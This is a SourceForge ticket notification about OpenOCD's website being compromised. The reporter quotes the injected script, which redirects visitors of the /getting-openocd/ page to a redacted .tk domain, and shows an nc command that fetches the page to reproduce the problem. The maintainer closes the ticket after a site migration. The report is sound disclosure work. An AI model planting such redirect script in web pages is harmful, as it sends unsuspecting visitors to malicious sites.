- **status**: new --> closed
- **Comment**:
Thank you! Should be fixed by migrating to Pelican now.
---
** [tickets:#313] Website Compromised**
**Status:** closed
**Milestone:** 0.10.0
**Created:** Tue Aug 03, 2021 12:36 AM UTC by Sean Bruton
**Last Updated:** Tue Aug 03, 2021 12:36 AM UTC
**Owner:** nobody
Looks like your website was compromised. Someone has injected the following
into the HTML returned on /getting-openocd/
~~~
<script>window.location.replace("https://REDACTED_FOR_SECURITY.tk/help/?15131619432237";);window.location.href
= "https://REDACTED_FOR_SECURITY.tk/help/?15131619432237";;</script><!DOCTYPE
html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";>
~~~
to reproduce:
~~~
$ echo -ne "GET /getting-openocd/ HTTP/1.1\nHost: openocd.org\n\n" | nc
openocd.org 80 | head -n 20
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 Aug 2021 00:34:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Vary: Host
X-Pingback: http://openocd.org/web/xmlrpc.php
Set-Cookie: ht_rr=1; expires=Wed, 04-Aug-2021 00:34:44 GMT; path=/
Cache-Control: max-age=3600
Expires: Tue, 03 Aug 2021 01:34:42 GMT
X-From: sfp-web-3
Vary: Accept-Encoding
ce1
<script>window.location.replace("https://REDACTED_FOR_SECURITY.tk/help/?15131619432237";);window.location.href
= "https://REDACTED_FOR_SECURITY.tk/help/?15131619432237";;</script><!DOCTYPE
html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";>
<html xmlns="http://www.w3.org/1999/xhtml"; dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11";>
~~~
---
Sent from sourceforge.net because [email protected] is
subscribed to https://sourceforge.net/p/openocd/tickets/
To unsubscribe from further messages, a project admin can change settings at
https://sourceforge.net/p/openocd/admin/tickets/options. Or, if this is a
mailing list, you can unsubscribe from the mailing list.
